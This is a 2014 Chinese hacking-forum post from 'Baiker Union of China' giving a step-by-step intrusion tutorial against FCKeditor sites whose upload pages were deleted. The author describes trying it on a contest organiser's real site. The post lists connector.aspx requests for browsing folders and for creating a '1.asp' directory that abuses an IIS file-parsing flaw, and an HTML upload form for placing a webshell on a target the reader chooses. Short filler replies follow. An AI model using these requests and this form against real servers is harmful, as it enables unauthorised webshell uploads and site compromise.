搜索
查看: 580|回复: 3

解决FCKEDITOR删除所有上传页面如何上传入侵

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2014-1-3 11:41:34 | 显示全部楼层 |阅读模式

好久没有脚本入侵了,今天因为参加了一个比赛,然后证书居然需要钱来买的,就很不爽,百度了下其官方网,进行了一次安检,结果是没有成功,因为iis的文件解析漏洞补上了,不过学到了一些Fckeditor在没有上传页面的情况下的入侵方式。

首先,你得确定下Fckeditor的版本。

/FCKeditor/editor/dialog/fck_about.html

其次,你确定下以下几个上传页面是否真的被删除了呢?

/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html

嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php

如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例

1.查看Media目录下的文件:

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

红色Media可以更改为File或者image,相应的进入文件或者图片目录下

2.利用iis解析漏洞创建1.asp特殊目录

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp

红色的是对应的Media目录,蓝色的是特殊目录名字

3.构建表单,上传webshell到特殊目录

<form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.itatpro.com/fckeditor ... ntFolder=%2Fasp.asp” method=”post”>
Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=http://www.xxx.org/”Upload”>
</form>

将以上代表保存为HTML格式,http://www.xxx.org修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为特殊目录名。

最后的一些提示

上 传之后的路径需要你在上传表单里面的代码里找,当然,他的呈现方式是一个上传好了的文件名,全路径必须你自己组合,我相信你是会的。如果访问之后发现无法 访问,试着上传一张正确的图片,再进行访问,如果访问成功,说明管理员已经补上了IIS路径解析漏洞,那你得另找出路了。


您可以更新记录, 让好友们知道您在做什么...
专业回帖 该用户已被删除
发表于 2014-1-3 12:34:26 | 显示全部楼层
支持一下
854955425 该用户已被删除
发表于 2014-1-3 14:26:50 | 显示全部楼层
小手一抖,钱钱到手!
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表